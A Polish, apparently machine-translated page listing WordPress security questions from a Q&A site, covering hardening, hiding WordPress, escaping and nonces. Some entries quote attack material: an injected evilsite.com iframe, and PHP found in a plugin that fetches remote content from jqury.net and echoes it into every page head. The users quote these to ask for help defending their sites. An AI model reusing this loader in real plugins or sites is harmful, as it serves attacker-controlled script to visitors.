Mam stronę internetową, dla której staramy się dyskretnie informować o tym, że korzystamy z WordPress. Jakie kroki możemy podjąć, aby uczynić to mniej oczywistym? EDYCJA - Ważna uwaga bezpieczeństwa: Proszę zrozumieć, że robienie tego doskonale jest niemożliwe zgodnie z odpowiedzią Marka , więc nie polegaj na tym jako środku bezpieczeństwa.
Jedną z najczęstszych najlepszych praktyk bezpieczeństwa w dzisiejszych czasach wydaje się być przenoszenie o wp-config.phpjeden katalog wyżej niż katalog główny vhosta . Nigdy tak naprawdę nie znalazłem dobrego wytłumaczenia tego, ale zakładam, że minimalizuje to ryzyko złośliwego lub zainfekowanego skryptu w katalogu głównym od odczytu hasła do bazy danych. Ale …
Mój fajny blog WordPress na http://fakeplasticrock.com (z WordPress 3.1.1) został zhakowany - wyświetlał się <iframe>na każdej stronie tak: <iframe src="http://evilsite.com/go/1"></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> Zrobiłem następujące Aktualizacja do wersji 3.1.3 poprzez wbudowany system aktualizacji WordPress Zainstalowałem skaner Exploit (wiele krytycznych ostrzeżeń o …
Używam wordpress na prywatnej stronie, na której użytkownicy przesyłają pliki. Używam „Prywatnego WordPressa”, aby uniemożliwić dostęp do strony, jeśli użytkownik nie jest zalogowany. Chciałbym zrobić to samo z plikami przesłanymi w folderze uploads. Jeśli więc użytkownik nie jest zalogowany, nie będzie mógł uzyskać dostępu do: https://xxxxxxx.com/wp-content/uploads/2011/12/xxxxxxx.pdf, jeśli spróbuje uzyskać dostęp, …
Czy można zmienić nazwę folderu wp-admin? Wiem, że mógłbym po prostu zmienić jego nazwę, ale jeśli nie jest to obsługiwane przez kod, wiele rzeczy by się zepsuło. Jeśli użyję niestandardowej nazwy folderu, spowoduje to, że będzie ona nieco bezpieczniejsza, bezpieczeństwo przez niejasność i tak dalej.
Podczas pisania wtyczek WordPress często trzeba skonfigurować opcje, dla których role w witrynie mają dostęp do określonych funkcji lub treści. Aby to zrobić, twórca wtyczki musi pobrać listę ról istniejących w witrynie, aby użyć jej w opcji. Ponieważ można tworzyć niestandardowe role, nie możemy założyć, że domyślne role są jedynymi …
Ostatnio miałem problem z tym, że nie byłem w stanie zainstalować wtyczki WP Smush Pro, ponieważ nie mam dostępnych opcji instalacji ręcznej ani instalacji jednym kliknięciem. Natknąłem się na ten post, który sugerował dostosowanie ustawień w wp-config.php. Dodałem sugerowane ustawienia, jednak najważniejsze wydaje się: define('FS_METHOD', 'direct'); Co chciałbym wiedzieć, jest …
Od czasu do czasu natrafiam na następujący fragment motywu: if ( ! defined('ABSPATH')) exit('restricted access'); Jest na początku niektórych (wszystkich?) Plików PHP w motywie i ma zapobiegać bezpośredniemu dostępowi do pliku przez nikczemne źródła. Widzę, że nie jest to uwzględnione w dwudziestu dziesięciu lub jedenastu i nigdy nie widziałem, aby …
Zaktualizowałem WordPress do 4.7.1, a potem próbowałem wyliczyć użytkowników za pomocą REST API, co powinno zostać naprawione, ale udało mi się odzyskać użytkowników. https://mywebsite.com/wp-json/wp/v2/users Wydajność: [{"id":1,"name":"admin","url":"","description":"","link":"https:\/\/mywebsite\/author\/admin\/","slug":"admin","avatar_urls":{"24": ... Dziennik zmian z najnowszej wersji: Interfejs API REST ujawnił dane użytkownika dla wszystkich użytkowników, którzy byli autorami postów typu publicznego. WordPress 4.7.1 ogranicza …
Po pewnym czasie WP wylogowuje wszystkich użytkowników i zmusza ich do ponownego zalogowania. W przypadku środowisk programistycznych na moim komputerze lokalnym jest to nieprzyjemne i absolutnie niepotrzebne. Czy istnieje oparty na API sposób wyłączania automatycznego wylogowywania na czas nieokreślony? Idealnie chciałbym coś, co mogę dodać wp-config.phpwraz z innymi ustawieniami związanymi …
W jakikolwiek sposób zmienić adres URL wp-login.php? Wydaje się niepewne, że każdy, kto kiedykolwiek korzystał z Wordpress, mógł łatwo sprawdzić, czy witryna go używa, i przejść bezpośrednio do strony logowania. Kiedyś istniała wtyczka o nazwie „Stealth login”, ale nie była aktualizowana. (I stąd nasza niechęć do polegania na wtyczkach).
W obecnej formie to pytanie nie pasuje do naszego formatu pytań i odpowiedzi. Oczekujemy, że odpowiedzi poparte będą faktami, referencjami lub wiedzą specjalistyczną, ale to pytanie prawdopodobnie będzie wymagało debaty, argumentów, ankiet lub rozszerzonej dyskusji. Jeśli uważasz, że to pytanie można poprawić i ewentualnie ponownie otworzyć, odwiedź centrum pomocy w …
Jaką różnicę powinienem zastosować? Wiem, że wp_verify_nonce sprawdza limit czasu, a check_admin_referer myślę, że wywołuje wp_verify_nonce, a także sprawdza segment adresu URL administratora, ale jestem nieco zdezorientowany, który powinienem użyć i kiedy. Dzięki za jasność.
Zamknięte. To pytanie jest nie na temat . Obecnie nie przyjmuje odpowiedzi. Chcesz poprawić to pytanie? Zaktualizuj pytanie, aby było tematyczne na WordPress Development Stack Exchange. Zamknięte 4 lata temu . Zainstalowałem wtyczkę Simple Login Lockdown i od kilku dni baza danych rejestruje ponad 200 rekordów dziennie. Myślę, że nie …
Jestem nowy w WordPress. Niedawno przeczytałem artykuł o tym, jak hakerzy mogą wykorzystać luki we wtyczkach. Różne źródła, takie jak Google Pagespeed, również odradzają mi korzystanie z wtyczek lub przynajmniej ograniczają je do minimum. Osobiście staram się również unikać wtyczek, ponieważ mam większą kontrolę nad tym, co dzieje się na …
Miałem klienta, który został ostatnio zhakowany i zauważyłem, że na jej stronie pojawiają się dziwne postacie, takie jak  i Æ. Okazuje się, że hakerzy zmienili blog_charset na UTF-7 w wp_optionstabeli w bazie danych. Ustawiłem go z powrotem na UTF-8, ale zastanawiałem się, czy w czasie, gdy był ustawiony na …
Obecnie opracowuję wtyczkę i istnieje duże prawdopodobieństwo, że wydam ją w publicznym repozytorium wtyczek, aby inni mogli z niej korzystać. Wtyczka będzie korzystać z interfejsu API. Aby korzystać z tego interfejsu API, musisz podać nazwę użytkownika i hasło. Więc moja wtyczka musi przechowywać te dane logowania w bazie danych. Nie …
Znalazłem to we wtyczce. Co to robi? czy to jest niebezpieczne? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }
Chcę się upewnić, że wszystkie dane w moich wtyczkach / motywach są bezpiecznie obsługiwane przed wejściem do bazy danych i przed wysłaniem do przeglądarki. Mój problem polega na tym, że istnieją sytuacje, w których interfejs API zajmuje się czyszczeniem dla Ciebie - na przykład podczas zapisywania pól meta - i …
Czy utrzymywanie wp-admin/install.phpi wp-admin/install-helper.phpwyciek bezpieczeństwa w nowszych wersjach wordpress? Domyślnie uprawnienia do plików wynoszą 644. Jeśli jest jakikolwiek wyciek, jaki proszę?
W obecnej formie to pytanie nie pasuje do naszego formatu pytań i odpowiedzi. Oczekujemy, że odpowiedzi poparte będą faktami, referencjami lub wiedzą fachową, ale to pytanie prawdopodobnie będzie wymagało debaty, argumentów, ankiet lub rozszerzonej dyskusji. Jeśli uważasz, że to pytanie można poprawić i ewentualnie ponownie otworzyć, odwiedź centrum pomocy w …
Widzę, że pliki SVG są domyślnie blokowane w programie do przesyłania multimediów i musisz dodać go jako obsługiwany typ MIME w functions.php. Jakie są przyczyny bezpieczeństwa?
Spojrzałem na kod, ale nie widziałem ucieczki na funkcjach takich jak the_title the_content the_excerptitp. Być może nie czytałem go poprawnie. Czy muszę uciec od tych funkcji w tworzeniu motywu, takich jak: esc_html ( the_title () ) Edycja: jak wskazano w odpowiedziach poniżej, powyższy kod jest niepoprawny niezależnie od tego - …
Mamy problemy z zewnętrznym programistą. Chcemy ograniczyć dostęp do wp-adminstrony tylko do dostępu wewnętrznego (przez VPN ). Po prostu nie będzie atakowany przez zewnętrznych użytkowników. Możemy wyliczyć administratorów z witryny i nie chcemy, aby zostali wyłudzeni. Nasz programista twierdzi, że nie możemy tego zrobić, ponieważ strona musi mieć zewnętrzną stronę …
Krótkie pytanie, które może trochę pomóc w bezpieczeństwie. Zauważyłem, że plik readme.html ma wymieniony numer wersji. Ponownie pojawia się po każdej aktualizacji, podobnie jak licence.txt i wp-config-sample.php. Czy istnieje prosty sposób, aby WordPress automatycznie usuwał te pliki po aktualizacji? Już blokuję wyświetlanie numeru wersji w metatagach, kanałach RSS, atomie itp. …
Konfiguracja WordPress do aktualizacji w aplikacji (tj. WordPress) jest dla mnie idealna ze względu na wygodę. Niemniej jednak niepokoją mnie wymagania. Wymagane pola, które pojawiają się po zainstalowaniu ssh2 dla php, pytają nie tylko o mój klucz publiczny, ale także o mój klucz prywatny. Sądzę, że wymagany byłby co najwyżej …
Patrząc na kodeks dla wp_insert_post () , stwierdza on, że ta funkcja „... dezynfekuje zmienne, wykonuje pewne kontrole, uzupełnia brakujące zmienne, takie jak data / czas itp.” (EDYCJA: Zaktualizowałem wpis Kodeksu, aby zawierał bardziej solidny przykład w tym bezpieczeństwo, a także meta post i przypisanie kategorii) Zastanawiam się tylko, czy …
To utrudnia moje kodowanie. Kodeks Wordpress uzasadnia użycie esc_url mówiąc niejasno o bezpieczeństwie. Ale czy to naprawdę jest warte kłopotów? Na przykład, jaka jest ważna, praktyczna korzyść z bezpieczeństwa przy użyciu <?php echo esc_url( home_url( '/' ) ); ?> zamiast <?php echo home_url() ?> PS: Nie mówię o tworzeniu motywów, …
Używamy plików cookie i innych technologii śledzenia w celu poprawy komfortu przeglądania naszej witryny, aby wyświetlać spersonalizowane treści i ukierunkowane reklamy, analizować ruch w naszej witrynie, i zrozumieć, skąd pochodzą nasi goście.
Kontynuując, wyrażasz zgodę na korzystanie z plików cookie i innych technologii śledzenia oraz potwierdzasz, że masz co najmniej 16 lat lub zgodę rodzica lub opiekuna.